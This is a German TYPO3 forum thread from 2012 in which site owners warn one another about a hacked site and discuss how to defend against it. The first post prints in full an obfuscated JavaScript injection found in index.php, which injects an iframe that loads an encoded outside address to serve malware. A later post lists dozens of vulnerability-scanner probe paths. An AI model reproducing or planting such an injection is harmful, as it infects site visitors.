TYPO3 "index.php" gehackt

  • pow pow
    Jedi-Ratsmitglied
    0 x
    719 Beiträge
    0 Hilfreiche Beiträge
    22. 03. 2012, 09:36

    Hallo T3'ler,

    heute musste ich mit erschrecken feststellen das meine Seite gehackt wurde.
    Zum glück nur minimal und ich konnte den "hack" gleich finden.

    In der index.php (root) war folgende Zeile:

    1. <script>var GlK = '06606503b06606506806606506506606507106606506006606506c06606506406606501f06606507206606507106606506206606503c06606502106606502106606501f06606507606606506806606506306606507306606506706606503c06606502106606503006606502106606501f06606506706606506406606506806606506606606506706606507306606503c06606502106606503006606502106606501f06606506806606506306606503c06606502106606507806606504006606506106606502106606501f06606506506606507106606506006606506c06606506406606506106606506e06606507106606506306606506406606507106606503c06606502106606502f06606502106606503d06606503b06606502e06606506806606506506606507106606506006606506c06606506406606503d';function tSc(uEZ,w1,w2){var gwl='';arr=uEZ.split('0'+w1+'0'+w2+'0');for(i=1; i<arr.length; i++){ gwl+='%'+(parseInt(arr[i], 16)+1).toString(16);}return gwl;} var MvX=unescape;document.write(MvX(tSc(GlK,'66','65')));document.getElementById('yAb').src = MvX(tSc('02f03906702f03907302f03907302f03906f02f03903902f03902e02f03902e02f03903002f03903302f03903502f03902d02f03903002f03903702f03903402f03902d02f03903102f03903302f03903802f03902d02f03903002f03903502f03903802f03902e02f03907202f03907502f03902e02f03906202f03906e02f03907402f03906d02f03907302f03902d02f03906f02f03906702f03906f02f03903e02f03906002f03906302f03906302f03903c02f039030','2f','39'));</script>

    Alles ist auf CHMOD 644?
    Konnte dies evtl. durch eine Alpha/Beta Extension zustandekommen?

    Was das Script macht, ist einen iFrame am Ende der Webseite zu platzieren. Man bemerkt es spätestens wenn man seine Seite/ sein Projekt besucht und eine Viruswarnung auftaucht.

    Dies ist weniger eine Frage, sondern eine Warnung, damit alle Ihre index.php prüfen.

    Grüße


  • 1
  • LuP LuP
    Jedi-Meister
    0 x
    496 Beiträge
    0 Hilfreiche Beiträge
    22. 03. 2012, 11:10

    Hallo pow,

    Hast Du alle Logs geprüft? FTP, Apache? Wichtig ist es zu wissen,
    wann die Änderung stattgefunden hat und wie sie zustande kam.
    Infizierter PC und gehackter FTP Account wären nicht auszuschließen.
    Suspekte/verwundbare Erweiterungen direkt an das Security-Team melden.
    Auch solltest Du künftig Integritätsprüfungen und Intrusion detection in Erwägung ziehen.

    VG,
    LuP

  • igorshmigor igorshmig...
    Jedi-Ratsmitglied
    0 x
    941 Beiträge
    0 Hilfreiche Beiträge
    22. 03. 2012, 11:15

    Übel, gerade vor kurzem war hier schon ein Beitrag über eine gehackte TYPO3-Seite und bei einem meiner Kunden wurde auch ein Versuch gestartet. Was geht denn ab zur Zeit?
    Danke für die Warnung.

  • Chrissli Chrissli
    Jedi-Ratsmitglied
    0 x
    710 Beiträge
    9 Hilfreiche Beiträge
    22. 03. 2012, 20:34

    Kurze Frage:

    du verwendest die aktuelle Version? Oder wurde evtl. "nur" eine schon bekannte Lücke in einer älteren Version ausgenutzt??

    God's in his heaven, all's right with the world

  • homy homy
    Padawan
    0 x
    52 Beiträge
    0 Hilfreiche Beiträge
    24. 03. 2012, 16:41

    Was nutzt ihr für Formulare? Evtl. ist hier die Lücke.

  • skydivematy skydivema...
    Jedi-Meister
    0 x
    276 Beiträge
    0 Hilfreiche Beiträge
    25. 03. 2012, 16:53

    Da es ums Hacken geht möcht ich Euch mal mein Realurl Errorlog von einer Zeitspanne von 4 wochen Zeigen. Alles Einträge mit Dubiosen Web Anfragen einer Webseite eines Bekannten die ich Pflege.

    1. de/kontakt/gb.php
    2. scripts/setup.php
    3. admin/scripts/setup.php
    4. admin/pma/scripts/setup.php
    5. admin/phpmyadmin/scripts/setup.php
    6. db/scripts/setup.php
    7. dbadmin/scripts/setup.php
    8. myadmin/scripts/setup.php
    9. mysql/scripts/setup.php
    10. mysqladmin/scripts/setup.php
    11. phpadmin/scripts/setup.php
    12. phpMyAdmin/scripts/setup.php
    13. phpmyadmin/scripts/setup.php
    14. phpmyadmin1/scripts/setup.php
    15. phpmyadmin2/scripts/setup.php
    16. pma/scripts/setup.php
    17. web/phpMyAdmin/scripts/setup.php
    18. xampp/phpmyadmin/scripts/setup.php
    19. web/scripts/setup.php
    20. php-my-admin/scripts/setup.php
    21. websql/scripts/setup.php
    22. phpMyAdmin-2/scripts/setup.php
    23. phpMyAdmin-2.2.3/scripts/setup.php
    24. phpMyAdmin-2.2.6/scripts/setup.php
    25. phpMyAdmin-2.5.1/scripts/setup.php
    26. phpMyAdmin-2.5.4/scripts/setup.php
    27. phpMyAdmin-2.5.5-rc1/scripts/setup.php
    28. phpMyAdmin-2.5.5-rc2/scripts/setup.php
    29. phpMyAdmin-2.5.5/scripts/setup.php
    30. phpMyAdmin-2.5.5-pl1/scripts/setup.php
    31. phpMyAdmin-2.5.6-rc1/scripts/setup.php
    32. phpMyAdmin-2.5.6-rc2/scripts/setup.php
    33. phpMyAdmin-2.5.6/scripts/setup.php
    34. phpMyAdmin-2.5.7/scripts/setup.php
    35. phpMyAdmin-2.5.7-pl1/scripts/setup.php
    36. phpMyAdmin-2.6.0-alpha/scripts/setup.php
    37. phpMyAdmin-2.6.0-alpha2/scripts/setup.php
    38. phpMyAdmin-2.6.0-beta1/scripts/setup.php
    39. phpMyAdmin-2.6.0-beta2/scripts/setup.php
    40. phpMyAdmin-2.6.0-rc1/scripts/setup.php
    41. phpMyAdmin-2.6.0-rc2/scripts/setup.php
    42. phpMyAdmin-2.6.0-rc3/scripts/setup.php
    43. phpMyAdmin-2.6.0/scripts/setup.php
    44. phpMyAdmin-2.6.0-pl1/scripts/setup.php
    45. phpMyAdmin-2.6.0-pl2/scripts/setup.php
    46. phpMyAdmin-2.6.0-pl3/scripts/setup.php
    47. phpMyAdmin-2.6.1-rc1/scripts/setup.php
    48. phpMyAdmin-2.6.1-rc2/scripts/setup.php
    49. phpMyAdmin-2.6.1/scripts/setup.php
    50. phpMyAdmin-2.6.1-pl1/scripts/setup.php
    51. phpMyAdmin-2.6.1-pl2/scripts/setup.php
    52. phpMyAdmin-2.6.1-pl3/scripts/setup.php
    53. phpMyAdmin-2.6.2-rc1/scripts/setup.php
    54. phpMyAdmin-2.6.2-beta1/scripts/setup.php
    55. phpMyAdmin-2.6.2/scripts/setup.php
    56. phpMyAdmin-2.6.2-pl1/scripts/setup.php
    57. phpMyAdmin-2.6.3/scripts/setup.php
    58. phpMyAdmin-2.6.3-rc1/scripts/setup.php
    59. phpMyAdmin-2.6.3-pl1/scripts/setup.php
    60. phpMyAdmin-2.6.4-rc1/scripts/setup.php
    61. phpMyAdmin-2.6.4-pl1/scripts/setup.php
    62. phpMyAdmin-2.6.4-pl2/scripts/setup.php
    63. phpMyAdmin-2.6.4-pl3/scripts/setup.php
    64. phpMyAdmin-2.6.4-pl4/scripts/setup.php
    65. phpMyAdmin-2.6.4/scripts/setup.php
    66. phpMyAdmin-2.7.0-beta1/scripts/setup.php
    67. phpMyAdmin-2.7.0-rc1/scripts/setup.php
    68. phpMyAdmin-2.7.0-pl1/scripts/setup.php
    69. phpMyAdmin-2.7.0-pl2/scripts/setup.php
    70. phpMyAdmin-2.7.0/scripts/setup.php
    71. phpMyAdmin-2.8.0-beta1/scripts/setup.php
    72. phpMyAdmin-2.8.0-rc1/scripts/setup.php
    73. phpMyAdmin-2.8.0-rc2/scripts/setup.php
    74. phpMyAdmin-2.8.0/scripts/setup.php
    75. phpMyAdmin-2.8.0.1/scripts/setup.php
    76. phpMyAdmin-2.8.0.2/scripts/setup.php
    77. phpMyAdmin-2.8.0.3/scripts/setup.php
    78. phpMyAdmin-2.8.0.4/scripts/setup.php
    79. phpMyAdmin-2.8.1-rc1/scripts/setup.php
    80. phpMyAdmin-2.8.1/scripts/setup.php
    81. phpMyAdmin-2.8.2/scripts/setup.php
    82. sqlmanager/scripts/setup.php
    83. mysqlmanager/scripts/setup.php
    84. p/m/a/scripts/setup.php
    85. PMA2005/scripts/setup.php
    86. pma2005/scripts/setup.php
    87. phpmanager/scripts/setup.php
    88. php-myadmin/scripts/setup.php
    89. phpmy-admin/scripts/setup.php
    90. webadmin/scripts/setup.php
    91. sqlweb/scripts/setup.php
    92. webdb/scripts/setup.php
    93. mysql-admin/scripts/setup.php
    94. databaseadmin/scripts/setup.php
    95. admm/scripts/setup.php
    96. admn/scripts/setup.php
    97. index.php
    98. admin/index.php
    99. admin/pma/index.php
    100. admin/phpmyadmin/index.php
    101. db/index.php
    102. dbadmin/index.php
    103. myadmin/index.php
    104. mysqladmin/index.php
    105. phpadmin/index.php
    106. phpMyAdmin/index.php
    107. phpmyadmin/index.php
    108. phpmyadmin1/index.php
    109. phpmyadmin2/index.php
    110. pma/index.php
    111. web/phpMyAdmin/index.php
    112. xampp/phpmyadmin/index.php
    113. web/index.php
    114. php-my-admin/index.php
    115. websql/index.php
    116. phpMyAdmin-2/index.php
    117. phpMyAdmin-2.2.3/index.php
    118. phpMyAdmin-2.2.6/index.php
    119. phpMyAdmin-2.5.1/index.php
    120. phpMyAdmin-2.5.4/index.php
    121. phpMyAdmin-2.5.5-rc1/index.php
    122. phpMyAdmin-2.5.5-rc2/index.php
    123. phpMyAdmin-2.5.5/index.php
    124. phpMyAdmin-2.5.5-pl1/index.php
    125. phpMyAdmin-2.5.6-rc1/index.php
    126. phpMyAdmin-2.5.6-rc2/index.php
    127. phpMyAdmin-2.5.6/index.php
    128. phpMyAdmin-2.5.7/index.php
    129. phpMyAdmin-2.5.7-pl1/index.php
    130. photo-gallery/www.calypsodivecenter.com
    131. FCKeditor/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    132. admin/fckeditor/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    133. admin/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    134. ajaxfilemanager/jscripts/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    135. faq/admin/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    136. fckeditor/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    137. gallery/zp-core/zp-extensions/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    138. includes/fckeditor/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    139. includes/tinymce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    140. javascript/tinymce/jscripts/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    141. js/jscripts/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    142. js/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    143. jscripts/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    144. main/inc/lib/fckeditor/editor//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    145. photo/zp-core/zp-extensions/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    146. scripts/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    147. shop/admin/includes/javascript/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    148. tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    149. zen/zp-core/zp-extensions/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    150. zenphoto/zp-core/zp-extensions/tiny_mce//plugins/ajaxfilemanager/jscripts/edit_area/edit_area.css
    151. /themes/Calypso/Calypso/timthumb.php
    152. /kontakt//wp-content/themes/Calypso/timthumb.php
    153. /themes/Calypso/timthumb.php
    154. /sitemap//wp-content/themes/Calypso/timthumb.php
    155. register-user/index.php
    156. wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php
    157. wp-content/plugins/wp-phpmyadmin/phpmyadmin/index.php
    158. PMA/index.php
    159. mysql/index.php
    160. sqlmanager/index.php
    161. mysqlmanager/index.php
    162. phpmanager/index.php
    163. webadmin/index.php
    164. sqlweb/index.php
    165. webdb/index.php
    166. mysql-admin/index.php
    167. php-myadmin/index.php
    168. phpmy-admin/index.php

    Ich weiss nicht wieviele Deny from ich schon in der .htaccess habe, aber nachdem ich aus einer Liste mit Blacklistet Hacker und Spammer Ip's noch zusätzlich in die .htaccess eingetragen hatte sind solche Webanfragen seit etwa 3 Wochen ausgeblieben.
    Aber es Stimmt schon das es in der Letzten Zeit erheblich zugenommen hat.

    Dass ist sehr Interessant. Wers noch nicht kennt. http://www.illutzmination.de/security.html

    gruss
    maty

  • skydivematy skydivema...
    Jedi-Meister
    0 x
    276 Beiträge
    0 Hilfreiche Beiträge
    25. 03. 2012, 16:55

    Sorry Vergessen. Die Meisten von Diesen Anfragen kommen aus der Ukraine, Russland, China.

  • Chrissli Chrissli
    Jedi-Ratsmitglied
    0 x
    710 Beiträge
    9 Hilfreiche Beiträge
    26. 03. 2012, 00:32

    Sorry wenn ich das sage, aber das Scannen von offenen Serverports,
    versuchte SSH-Logins mit 08/15-Credentials oder das Aufrufen
    von evtl. existierenden Dateien ( seien es PhpMyAdmin, setup-Scripte o.ä. )
    ist nichts besonders auffälliges und tritt auch nicht erst seit kurzem auf.

    Ich betreue schon seit mehreren Jahren den Server eines Kunden und da nehmen solche
    traurigen Versuche etwa 80-90% des Logs ein. Und das da die östlich gelegenen Länder
    weit vorne mit dabei sind ist auch ein alter Hut.

    Alles in allem hat das aber mit dem eigentlichen Problem nichts zu tun, da immer noch
    nicht klar ist, ob es sich um eine Lücke in einer aktuellen Typo-Version handelt oder
    "nur" der PC / FTP-Zugang korrupt war oder eine andere, nicht Typo-relevante, Lücke ausgenutzt wurde.

    God's in his heaven, all's right with the world

  • LutzOMat LutzOMat
    TYPO3-Anwärter
    0 x
    7 Beiträge
    0 Hilfreiche Beiträge
    26. 03. 2012, 21:58

    Hallo Chrissli,

    natürlich hast Du Recht, dass die klassischen Scans nichts ungewöhnliches sind. Wenn man kein ungeschütztes phpMyAdmin auf dem Server hat und auch sonst nichts "kritisches" kann man das alles ignorieren.

    Meine Taktik ist es jedoch, bei jeder auftretenden Ungereimtheit den Besucher rigoros auszusperren. Auch derjenige, der nicht total planlos vorgeht, sondern es speziell auf Typo3 abgesehen hat, erzeugt ein paar Fehler, die es ermöglichen, sein Vorhaben mit fail2ban oder mod_security zu erkennen und unterbinden.

    So wird zum Beispiel im noch gerade halbwegs aktuellen Security Beitrag
    typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2011-004/
    als Lösung eine mod_Security Regel angegeben.

    Ich würde den Einsatz von fail2ban / mod_security daher jedem Server-Admin sehr ans Herz legen.

    [quote="Chrissli"]
    Sorry wenn ich das sage, aber das Scannen von offenen Serverports,
    versuchte SSH-Logins mit 08/15-Credentials oder das Aufrufen
    von evtl. existierenden Dateien ( seien es PhpMyAdmin, setup-Scripte o.ä. )
    ist nichts besonders auffälliges und tritt auch nicht erst seit kurzem auf.

    Ich betreue schon seit mehreren Jahren den Server eines Kunden und da nehmen solche
    traurigen Versuche etwa 80-90% des Logs ein. Und das da die östlich gelegenen Länder
    weit vorne mit dabei sind ist auch ein alter Hut.

    Alles in allem hat das aber mit dem eigentlichen Problem nichts zu tun, da immer noch
    nicht klar ist, ob es sich um eine Lücke in einer aktuellen Typo-Version handelt oder
    "nur" der PC / FTP-Zugang korrupt war oder eine andere, nicht Typo-relevante, Lücke ausgenutzt wurde.
    [/quote]

  • 1